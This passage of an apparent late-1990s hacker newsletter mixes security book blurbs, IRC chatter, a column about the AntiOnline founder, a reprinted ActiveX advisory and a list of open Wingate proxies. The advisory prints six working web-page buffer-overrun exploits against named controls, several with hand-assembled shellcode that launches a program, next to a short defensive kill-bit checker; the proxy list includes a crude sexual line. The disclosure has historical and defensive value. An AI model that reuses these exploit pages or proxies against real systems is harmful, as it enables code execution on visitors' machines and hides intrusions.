Do you need to secure your network? Here's the book that will help you implement and maintain effective network security, no matter what size your network is or which NOS you're using. Packed with practical advice and indispensable information, this book systematically identifies the threats that your network faces and explains how to eliminate or minimize them. Covers all major network operating systems -- NT, NetWare, and Unix -- and all aspects of network security, from physical security of premises and equipment to anti-hacker countermeasures to setting up your own Virtual Private Networks. The CD includes evaluation and demonstration versions of commercial firewalls, intrusion detection software, and a complete security policy.
- Cisco IOS Network Security - <http://www.amazon.com/exec/obidos/ASIN/1578700574/netsecurity>
Divided into five sections, the stage is set in the book's first chapter on security fundamentals. Cautioning against a slapdash approach, the authors offer pointers on developing and implementing a security policy for your organization. Heavily promoted is Cisco's Authentication, Authorization, and Accounting (AAA) security framework. Authentication lets you identify your users, authorization lets you decide what they can and can't have access to, and accounting lets you know what processes users are running and how much of the network's resources they are consuming. Cisco's team maintains that the AAA system forces you to keep a tight rein on your network, ultimately resulting in a more secure environment.
- Cryptography and Network Security : Principles and Practice -
<http://www.amazon.com/exec/obidos/ASIN/0138690170/netsecurity>
KEY BENEFIT: This book presents detailed coverage of network security technology, the standards that are being developed for security in an internetworking environment, and the practical issues involved in developing security applications. KEY TOPICS: Opening with a tutorial and survey on network security technology, Stallings provides a sound mathematical foundation for developing the algorithms and results that are the cornerstone of network security. Each basic building block of network security is covered, including conventional and public-key cryptography, authentication, and digital signatures, as are methods for countering hackers and other intruders and viruses. The balance of the book is devoted to an insightful and thorough discussion of all the latest important network security applications, including PGP, PEM, Kerberos, and SNMPv2 security. Now in its Second Edition, the book has been completely updated, reflecting the latest developments in the field.
- Internet Security : Professional Reference - <http://www.amazon.com/exec/obidos/ASIN/156205760X/netsecurity>
Internet Security covers far more material than most other books on the subject, but--inevitably--in less depth. You'll find chapters on daemons, Unix-to-Unix copy (UUCP), audit trails, spoofing and sniffing, SATAN, Kerberos, encryption and PGP, Java, CGI, and viruses. Encompassing such a broad range of material in detail is risky, and this book suffers from several gaps. For example, the subject of electronic commerce goes untouched, with no mention of payment-specific schemes such as CyberCash or protocols such as Secure Electronic Transaction (SET). For those topics that are included, the level of depth varies considerably: Some topics are covered by well-written overviews, others by listing the programs' parameters in excruciating detail, and still others by simplistic tutorials that seem out of place in a technical volume. In addition, there are topics such as encryption, which are scattered across many sections.
<multisync> i got multitasking skills so i am sex0ring and chatting at the same time
copyright (c) SLa5H ,member of HWA.hax0r.news
@HWA
15.0 Forbidden Knowledge #7 is being released
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[15:50] <wyze1> FK7 haz da following 1nph0z3: Summary of the new telecommunications act,
Windows NT low level security features and how they interact with virtual memory and
process management, Use and Abuse of offline internet access services, Defeating portscan
detection, An introduction to using gawk, Some serious commentary on the government and on
the hacking scene, A Mass Fake Portscanner, A Mass CGI Vulnerability Scanner with Wingate
Support, A PortSentry Scanner and more...
@HWA
16.0 The 'real' story behind JP and PSS as per Forbes magazine...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Via PSS
http://www.forbes.com/columnists/penenberg/
Go ahead and sue!
IT'S A SAD FACT, but whenever someone is cited as an expert in
one publication, he is almost sure to be quoted in another--and
another and another. The reason is simple: The first thing a journalist
does when beginning a story is to see what else has been written on
the topic. Culling sources from other news articles is a good way
to get started.
The problem is, few reporters check out these "experts," figuring that if
a source made it into, say, The New York Times or The
Washington Post, he must be reliable and, well, expert. Think of it
as an extension of Howard Stern's media strategy. Stern once said he
himself first coined the term "King of All Media," figuring that the
mainstream press would then start to
call him that. (It did.)
How else to explain the schizophrenic emergence of
twenty-year-old John Vranesevich, founder and
operator of antionline.com, a web site that purports to
follow the hacker scene. In the realm of mass media,
"JP" has become a star, a youthful public figure who
has been quoted extensively for his computer-security
expertise and inside knowledge of the hacking world.
But in hacker circles he is a pariah. Perhaps only his
close ally, Carolyn Meinel (a.k.a. "The Happy
Hacker"), inspires more vitriol. At this year's Defcon,
the hacker conference held in Las Vegas, Meinel had
the dubious honor of being bodily ejected from the
convention hall.
It's hard to gauge just how elite JP's hacker and
computer-security skills are. But we do know his web
site was taken down in August when someone with an
account in Russia tricked AntiOnline into downloading
software that redirected its visitors to another site. The
hacker, obviously not a fan of JP's, included this
message: "Expensive security systems do not protect
from stupidity."
And online columnist Lew Koch, of CyberWire
Dispatch, interviewed JP at length, exposing vast gaps
of knowledge. For instance, Koch questioned JP about
AntiOnline's alleged scoop of the hack of an atomic
research center last year, yet he couldn't remember
which country housed the center. JP kept insisting it
was Israel, and, according to Koch, called the
Bombay Atomic Research Center the "B'Hadvah
Atomic Research Center." When Koch corrected him,
JP admitted it must have been India. JP also claims
he has "semi-contractual" relationships with NASA
and the Defense Information Systems Agency
(DISA), yet Koch says both agencies deny this.
But the mass media appears ignorant of this. The New
York Times turned to Vranesevich when it needed
comment on a rash of anti-government hacks, while
The Wall Street Journal Europe dubbed him an
"online-security specialist." The Baltimore Sun asked
for his opinion on the hack of the Johns Hopkins'
medical school site. The Orange County Register
invited him to bash hacker/martyr Kevin Mitnick, which
he did with glee, saying that hackers don't have a clue
about Mitnick's case, they "just heard it's cool to
support Mitnick, and that is what they do." And the
San Diego Union-Tribune dialed him up to ask about
the threat of computer viruses.
Of course, JP has nothing against good press. It's the
bad press that lets him unsheathe his sharpest
weapon. No, not the facts; those would only get in the
way. We're talking about the threat of a lawsuit.
In June, JP contacted Harvard University to complain
about a computer-security web site rival called
PacketStorm, which had posted some nasty pictures,
along with even nastier commentary. Harvard, afraid of
a lawsuit, pulled the site, which was a favorite of
computer-security professionals. JP claims on his web
site that he didn't explicitly threaten lawsuit, but the
University certainly took it that way. A Harvard
spokesman told me this was the first time Harvard had
ever pulled the plug on a site for "objectionable
material." (Eventually, PacketStorm found a home with
Kroll-O'Gara, the big-time detective agency in New
York.)
Then in July, The Ottawa Citizen ran a story about JP,
reporting allegations that JP is under investigation by
the FBI for "employing hackers to target high-profile
sites in order to scoop the rest of the media with
exclusive reporting." Vranesevich contacted the
newspaper and threatened to sue. Although Mark
Anderson, The Citizen's high tech editor, said he was
confident in the story, the FBI would not comment
whether it was in fact investigating JP or not, even
though several other sources in the know insisted he
was. As a result, the Citizen removed the story from
its web site, rather than face a potential lawsuit.
"It's sad," Anderson says. "You're confident you have
reliable information, but the threat of a lawsuit forces
you to pull your story. The onus was on us to prove
that Vranesevich is under investigation by the FBI, but
the FBI wouldn't say it outright. Since Canadian libel
law is tougher than American libel law, we felt we had
no choice."
In addition, folks trolling around cyberspace say that
Vranesevich has threatened them with lawsuits
whenever they post anything negative about him on
their web sites. I wonder what he would do if someone
actually took him up on this, since lawyers are
expensive and, by all accounts, JP's business is far
from being a cash cow. Perhaps, after reading this,
he'll even sue me.
@HWA
17.0 ActiveX Buffer Overruns Advisory
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclaimer: I'm not responsible for anything, unless it's
good.
This advisory outlines several buffer overruns in several
controls, and the vulnerability of ActiveX controls to
buffer overrun attacks in general. It appears that the
ActiveX/OLE/COM technology in general does no buffer checks
before passing parameters to controls, leaving the checking
up to the control in question. Hence, many poorly written
controls are individually susceptible to buffer overrun
attacks, independent of the environment they are controlled
from and of other controls on the system. The following
controls are probably just a few of the vulnerable controls
in common use, and include one control from a third-party
vendor (Adobe). Because these controls are marked as
safe for scripting, they may be exploited through IE via
a web page, E-mail, or anywhere else where 'safe' ActiveX
controls may be scripted (i.e. some newsgroup readers and
other E-mail clients).
Known Affected Controls:
Acrobat Control for ActiveX - PDF.OCX v1.3.188
Setupctl 1.0 Type Library - SETUPCTL.DLL v1, 1, 0, 6
EYEDOG OLE Control module - EYEDOG.OCX v1.1.1.75
MSN ActiveX Setup BBS Control - SETUPBBS.OCX v4.71.0.10
hhopen OLE Control Module - HHOPEN.OCX v1, 0, 0, 1
RegWizCtrl 1.0 Type Library - REGWIZC.DLL v3, 0, 0, 0
Each control contains at least one method that handles
strings incorrectly; when passed a string that is too
large, a classic buffer overrun occurs, allowing arbitrary
code to be executed on the client.
Protection:
Microsoft was notified of these issues around a month ago
and is releasing a patch to revoke the hhopen, regwiz and
setupctl controls; a patch has already been released for
Eyedog. For the other controls, and any others found to be
vulnerable, see Microsoft Knowledge Base article Q240797 on
how to stop an ActiveX control from running in IE. If pain
persists, disable ActiveX scripting altogether in IE.
How to Stop an ActiveX Control from Running in Internet
Explorer
http://support.microsoft.com/support/kb/articles/q240/7/97.asp
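As an added defender-side example (not part of the advisory, and not Shane Hird's or Microsoft's code), the following Python script ties the Known Affected Controls list to the KB Q240797 mitigation. It reads a regedit export of the IE "ActiveX Compatibility" key, reports which of the six controls still lack the kill bit (the "Compatibility Flags" value 0x400 that the KB article describes), and scans a page or mail body for object tags that would instantiate one of them, so an administrator can see which affected controls a given piece of content could reach on a given host. The registry path and flag value are as Microsoft documents them; the CLSIDs are taken from the object tags in the exploit listings that follow; the .reg text, the HTML and the function names are my own constructed assumptions.

```python
import re

# CLSIDs of the controls named in the advisory, taken from its <object> tags.
AFFECTED_CONTROLS = {
    "06A7EC63-4E21-11D0-A112-00A0C90543AA": "EYEDOG.OCX (MSInfoLoadFile)",
    "130D7743-5F5A-11D1-B676-00A0C9697233": "HHOPEN.OCX (OpenHelp)",
    "8F0F5093-0A70-11D0-BCA9-00C04FD85AA6": "SETUPBBS.OCX (vAddNewsServer / bIsNewsServerConfigured)",
    "CA8A9780-280D-11CF-A24D-444553540000": "PDF.OCX (setview)",
    "F72A7B0E-0DD8-11D1-BD6E-00AA00B92AF1": "SETUPCTL.DLL (DistUnit / InstallNow)",
    "50E5E3D1-C07E-11D0-B9FD-00A0249F6B00": "REGWIZC.DLL (InvokeRegWizard)",
}

# Kill-bit mechanism from KB Q240797: a REG_DWORD "Compatibility Flags" with
# bit 0x400 set under this key stops IE from instantiating the control.
KILL_BIT = 0x400
COMPAT_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility"

# Matches <object classid="clsid:...">, case-insensitively, with optional quotes
# and whitespace; the GUID is captured in its 8-4-4-4-12 form.
OBJECT_RE = re.compile(
    r'<object\b[^>]*?\bclassid\s*=\s*["\']?\s*clsid:\s*'
    r'([0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12})',
    re.IGNORECASE,
)


def parse_kill_bits(reg_text):
    """Return {CLSID: Compatibility Flags} for every control subkey found in a
    regedit export (REGEDIT4 or 'Windows Registry Editor' format)."""
    flags = {}
    current = None
    prefix = COMPAT_KEY.lower() + "\\{"
    for raw in reg_text.splitlines():
        line = raw.strip()
        key = re.match(r"\[(.+)\]$", line)
        if key:
            name = key.group(1)
            if name.lower().startswith(prefix) and name.endswith("}"):
                current = name[len(prefix):-1].upper()
                flags.setdefault(current, 0)  # subkey present but no value yet
            else:
                current = None
            continue
        val = re.match(r'"Compatibility Flags"=dword:([0-9A-Fa-f]{1,8})$', line)
        if val and current is not None:
            flags[current] = int(val.group(1), 16)
    return flags


def exposed_controls(reg_text):
    """Affected CLSIDs that are NOT blocked by the kill bit on this host."""
    flags = parse_kill_bits(reg_text)
    return sorted(c for c in AFFECTED_CONTROLS if not flags.get(c, 0) & KILL_BIT)


def referenced_controls(html):
    """Affected CLSIDs that the content would instantiate, in document order."""
    found = []
    for m in OBJECT_RE.finditer(html):
        clsid = m.group(1).upper()
        if clsid in AFFECTED_CONTROLS and clsid not in found:
            found.append(clsid)
    return found


def assess(html, reg_text):
    """{CLSID: True if the content reaches an affected control that is still
    exposed on this host, False if the kill bit already blocks it}."""
    exposed = set(exposed_controls(reg_text))
    return {c: (c in exposed) for c in referenced_controls(html)}


# Constructed sample export: Eyedog and hhopen killed, PDF.OCX present but not
# killed, the other three controls have no entry at all (also exposed).
SAMPLE_REG = r"""REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{06A7EC63-4E21-11D0-A112-00A0C90543AA}]
"Compatibility Flags"=dword:00000400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{130D7743-5F5A-11D1-B676-00A0C9697233}]
"Compatibility Flags"=dword:00000400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CA8A9780-280D-11CF-A24D-444553540000}]
"Compatibility Flags"=dword:00000000
"""

# Constructed sample page: one killed control, one exposed one, and an
# unrelated placeholder CLSID (all zeros) that is not in the advisory.
SAMPLE_HTML = """<html><body>
<object classid="clsid:06A7EC63-4E21-11D0-A112-00A0C90543AA" id="eye"></object>
<OBJECT CLASSID='clsid:ca8a9780-280d-11cf-a24d-444553540000' id="pdf"></OBJECT>
<object classid="clsid:00000000-0000-0000-0000-000000000000" id="other"></object>
</body></html>"""

if __name__ == "__main__":
    for clsid, exposed in assess(SAMPLE_HTML, SAMPLE_REG).items():
        state = "EXPOSED (no kill bit)" if exposed else "blocked by kill bit"
        print(f"{clsid}  {AFFECTED_CONTROLS[clsid]}: {state}")
```

The script works on an exported .reg file rather than the live registry so it runs on any platform; on the Windows host itself the same check can be made against the live key with the standard `winreg` module. A control that has no subkey at all is treated as exposed, since the kill bit only protects when the value is actually present.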
Details:
For each exploit we have full control of the RET address;
knowing where to RET to in order to execute our code is
easier for some controls than others. For the controls
where no known fixed or referenced location of the code can
be found, I will simply RET to ExitProcess, although it is
still possible, if more difficult, to execute arbitrary
code. For the exploits where it is easy to RET to the code,
I will demonstrate how to execute a program (CALC.EXE) using
fixed API locations in Win98; you will need to modify these
addresses depending on the versions in use. For these
exploits, as in a couple of other Win exploits, a JMP ESP
is required to get to the code. I didn't manage to find one
in Kernel32 or IExplore; however, there does appear to be
one in Shell32 (version 4.72.3110.6) at 7FD035EB, and you
will also need to modify this address depending on your
version. So if you get a crash at around this address, then
it is most likely possible to run the exploit; the address
just needs to be changed. It should be noted that arbitrary
code may be executed, not just running a program; this is
just an example. Also, I haven't tried posting HTML to this
forum before, so hopefully it will turn out ok; if not,
could the moderators please convert the HTML to plaintext
or something.
============================================================
EYEDOG:
With this control, MSInfoLoadFile is the offending method.
There is no easy way to RET to our code, so instead, I have
shown how to simply RET to ExitProcess directly. This will
cause the host to terminate.
<object classid="clsid:06A7EC63-4E21-11D0-A112-00A0C90543AA" id="eye"></object>
<script language="vbscript"><!--
msgbox("EYEDOG OLE Control module Buffer Overrun (Local Version)" + Chr(10) + "Written by Shane Hird")
'Padding for the exploit
expstr = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAA"
'RET address (ExitProcess, BFF8D4CA)
expstr = expstr + Chr(202) + Chr(212) + Chr(248) + Chr(191)
'Call exploitable method (MSInfoLoadFile)
eye.MSInfoLoadFile(expstr)
--></script>
============================================================
HHOPEN:
This control is a little more difficult to exploit, as the
RET address is in the middle of the string, and once again
there is no easy way to RET to our code, so I have RET'd to
ExitProcess directly instead. In this case, OpenHelp is the
vulnerable method, and the exploit is possible when the
method is called with a valid help file, and a long Help
Section.
<object classid="clsid:130D7743-5F5A-11D1-B676-00A0C9697233" id="hhopen"></OBJECT>
<script language="vbscript"><!--
msgbox("hhopen OLE Control Module Buffer Overrun" + Chr(10) + "Written By Shane Hird")
expstr = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
'Where the RET address appears to be, RET to ExitProcess (BFF8D4CA)
expstr = expstr + Chr(202) + Chr(212) + Chr(248) + Chr(191)
'Extra padding to trigger the overrun
expstr = expstr & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAA"
'Call exploitable method, note the valid help file
hhopen.OpenHelp "Winhlp32.hlp", expstr
--></script>
============================================================
SETUPBBS:
When this control is initialised, it will display a prompt
notifying the user that the control is capable of modifying
Mail and News configuration etc and asks the user whether
he/she wishes the control to proceed. This control is
exploitable through two different methods, vAddNewsServer
and bIsNewsServerConfigured. I have simply RET'd to
ExitProcess with this exploit, although there are other
possibilities.
<object classid="clsid:8F0F5093-0A70-11D0-BCA9-00C04FD85AA6" id="setupbbs"></OBJECT>
<script language="vbscript"><!--
msgbox("MSN Setup BBS Buffer Overrun" + Chr(10) + "Written by Shane Hird")
expstr = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
'RET address (ExitProcess BFF8D4CA)
expstr = expstr + Chr(202) + Chr(212) + Chr(248) + Chr(191)
'This buffer overrun can be triggered by either method.
'setupbbs.vAddNewsServer expstr, true
setupbbs.bIsNewsServerConfigured expstr
--></script>
============================================================
PDF
This control from Adobe Acrobat can be exploited through
the setview method. Because ESP points to the address
after the RET address, we can place arbitrary code at that
point and jump to it by RET'ing to a JMP ESP, in this case
one found in Shell32. The code simply executes CALC.EXE,
then calls ExitProcess to terminate the host without it
crashing. I have attempted to notify Adobe of the issue;
however, they don't appear to have any form of direct
secure@ address.
<object classid="clsid:CA8A9780-280D-11CF-A24D-444553540000" id="pdf"></object>
<script language="VBscript"><!--
msgbox("Adobe Acrobat OCX Buffer Overrun" + Chr(10) + "Written by Shane Hird")
expstr = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAA"
'Address in SHELL32, Win98 (7FD035EB) of JMP ESP
'You may need to use a different address
expstr = expstr + Chr(235)
expstr = expstr + Chr(53)
expstr = expstr + Chr(208)
expstr = expstr + Chr(127)
'Stack is slightly trashed, but NOPs fix it up ok
expstr = expstr + Chr(144) + Chr(144) + Chr(144) + Chr(144) + Chr(144)
'MOV EDI, ESP
expstr = expstr + Chr(139) + Chr(252)
'ADD EDI, 19 (Size of code)
expstr = expstr + Chr(131) + Chr(199) + Chr(25)
'PUSH EAX (Window Style EAX = 1)
expstr = expstr + Chr(80)
'PUSH EDI (Address of command line)
expstr = expstr + Chr(87)
'MOV EDX, BFFA0960 (WinExec, Win98)
expstr = expstr + Chr(186) + Chr(96) + Chr(9) + Chr(250) + Chr(191)
'CALL EDX
expstr = expstr + Chr(255) + Chr(210)
'XOR EAX, EAX
expstr = expstr + Chr(51) + Chr(192)
'PUSH EAX
expstr = expstr + Chr(80)
'MOV EDX, BFF8D4CA (ExitProcess, Win98)
expstr = expstr + Chr(186) + Chr(202) + Chr(212) + Chr(248) + Chr(191)
'CALL EDX
expstr = expstr + Chr(255) + Chr(210)
'Replace with any command + 0 (automatically appended)
expstr = expstr + "CALC.EXE"
'Call exploitable method
pdf.setview(expstr)
--></script>
============================================================
SETUPCTL
This is apparently a control that was once used for the IE
update web site, which is no longer in use, although it
should still exist on a lot of systems. With this exploit,
similar to the PDF exploit, ESP points to our code, so we
simply RET to the same JMP ESP in Shell32. This exploit
differs in that we set a property first (DistUnit) with the
long string, then call the method (InstallNow). Again, I
have simply demonstrated how to execute CALC.EXE, though any
code can be executed.
<object classid="clsid:F72A7B0E-0DD8-11D1-BD6E-00AA00B92AF1" id="setupctl">
</object>
<script language="vbscript"><!--
msgbox("Setupctl 1.0 Type Library Buffer Overrun" + Chr(10) + "Written by Shane Hird")
expstr = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAA"
'Address in SHELL32, Win98 (7FD035EB) of JMP ESP
'You may need to use a different address
expstr = expstr + Chr(235)
expstr = expstr + Chr(53)
expstr = expstr + Chr(208)
expstr = expstr + Chr(127)
'NOP for debugging purposes
expstr = expstr + Chr(144)
'MOV EDI, ESP
expstr = expstr + Chr(139) + Chr(252)
'ADD EDI, 19h (Size of code)
expstr = expstr + Chr(131) + Chr(199) + Chr(25)
'PUSH EAX (Window Style EAX = 41414141)
expstr = expstr + Chr(80)
'PUSH EDI (Address of command line)
expstr = expstr + Chr(87)
'MOV EDX, BFFA0960 (WinExec, Win98)
expstr = expstr + Chr(186) + Chr(96) + Chr(9) + Chr(250) + Chr(191)
'CALL EDX
expstr = expstr + Chr(255) + Chr(210)
'XOR EAX, EAX
expstr = expstr + Chr(51) + Chr(192)
'PUSH EAX
expstr = expstr + Chr(80)
'MOV EDX, BFF8D4CA (ExitProcess, Win98)
expstr = expstr + Chr(186) + Chr(202) + Chr(212) + Chr(248) + Chr(191)
'CALL EDX
expstr = expstr + Chr(255) + Chr(210)
'Replace with any command + 0 (automatically appended)
expstr = expstr + "CALC.EXE"
'Run exploit
setupctl.DistUnit = expstr
setupctl.InstallNow
--></script>
============================================================
REGWIZC
The Registration Wizard control used by Microsoft to
register MS products also contains a buffer overrun in
the 'InvokeRegWizard' method. When called with a long
string, pre-pended with '/i', we can gain control of the
RET address and exploit the control in a similar manner as
the PDF control. This exploit will cause a 'Regwiz.log'
file to be created in the temporary directory, and once
again will execute CALC.EXE and terminate the host.
<object classid="clsid:50E5E3D1-C07E-11D0-B9FD-00A0249F6B00" id="RegWizObj">
</object>
<script language="VbScript" ><!--
msgbox("Registration Wizard Buffer Overrun" + Chr(10) + "Written by Shane Hird")
expstr = "/i " & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
         "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
'We overflowed to the RET point of the stack
'No NULL's allowed so ret to <JMP ESP> in Shell32
'Address in SHELL32, Win98 (7FD035EB) of JMP ESP
'You may need to use a different address
expstr = expstr & Chr(235)
expstr = expstr & Chr(53)
expstr = expstr & Chr(208)
expstr = expstr & Chr(127)
'NOP for debugging purposes
expstr = expstr + Chr(144)
'MOV EDI, ESP
expstr = expstr + Chr(139) + Chr(252)
'ADD EDI, 19 (Size of code)
expstr = expstr + Chr(131) + Chr(199) + Chr(25)
'PUSH EAX (Window Style EAX = 41414141)
expstr = expstr + Chr(80)
'PUSH EDI (Address of command line)
expstr = expstr + Chr(87)
'MOV EDX, BFFA0960 (WinExec, Win98)
expstr = expstr + Chr(186) + Chr(96) + Chr(9) + Chr(250) + Chr(191)
'CALL EDX
expstr = expstr + Chr(255) + Chr(210)
'XOR EAX, EAX
expstr = expstr + Chr(51) + Chr(192)
'PUSH EAX
expstr = expstr + Chr(80)
'MOV EDX, BFF8D4CA (ExitProcess, Win98)
expstr = expstr + Chr(186) + Chr(202) + Chr(212) + Chr(248) + Chr(191)
'CALL EDX
expstr = expstr + Chr(255) + Chr(210)
'Replace with any command + 0 (automatically appended)
expstr = expstr + "CALC.EXE"
RegWizObj.InvokeRegWizard(expstr)
--></script>
============================================================
Sorry for the length of this advisory, but as there are
several exploits, and probably many more, it was necessary.
It should be noted that not only MS ActiveX controls are
susceptible, but also many other vendors' controls. I cannot
possibly go through all the controls which are available to
the public, but the controls which are installed by default
on most systems are obviously the most serious.
-Shane Hird <s.hird@student.qut.edu.au>
First year IT student at QUT, Brisbane, Australia.
Sponsors?
18.0 CyberArmy: Wingates list
~~~~~~~~~~~~~~~~~~~~~~~~
Some are bad, some are good, some are undoubtedly phishes or traps; buyer beware. These
are posted here as always with no strings; they come from a third party and are posted in
order for you to make sure YOU aren't on this list!
209.112.31.34 [latency: 10/01/99 16:14:15 PDT by sandoc]
210.169.139.161 [latency: 10/01/99 16:12:44 PDT by sandoc]
207.107.88.21 [latency: 10/01/99 15:29:03 PDT by sandoc]
212.174.65.76 [latency: 10/01/99 14:52:38 PDT by sandoc]
ss06.co.us.ibm.com [latency: 10/01/99 14:49:32 PDT by sandoc]
o u mind...if i fuck u? [latency: 10/01/99 13:00:20 PDT by Ivan Dimitrov]
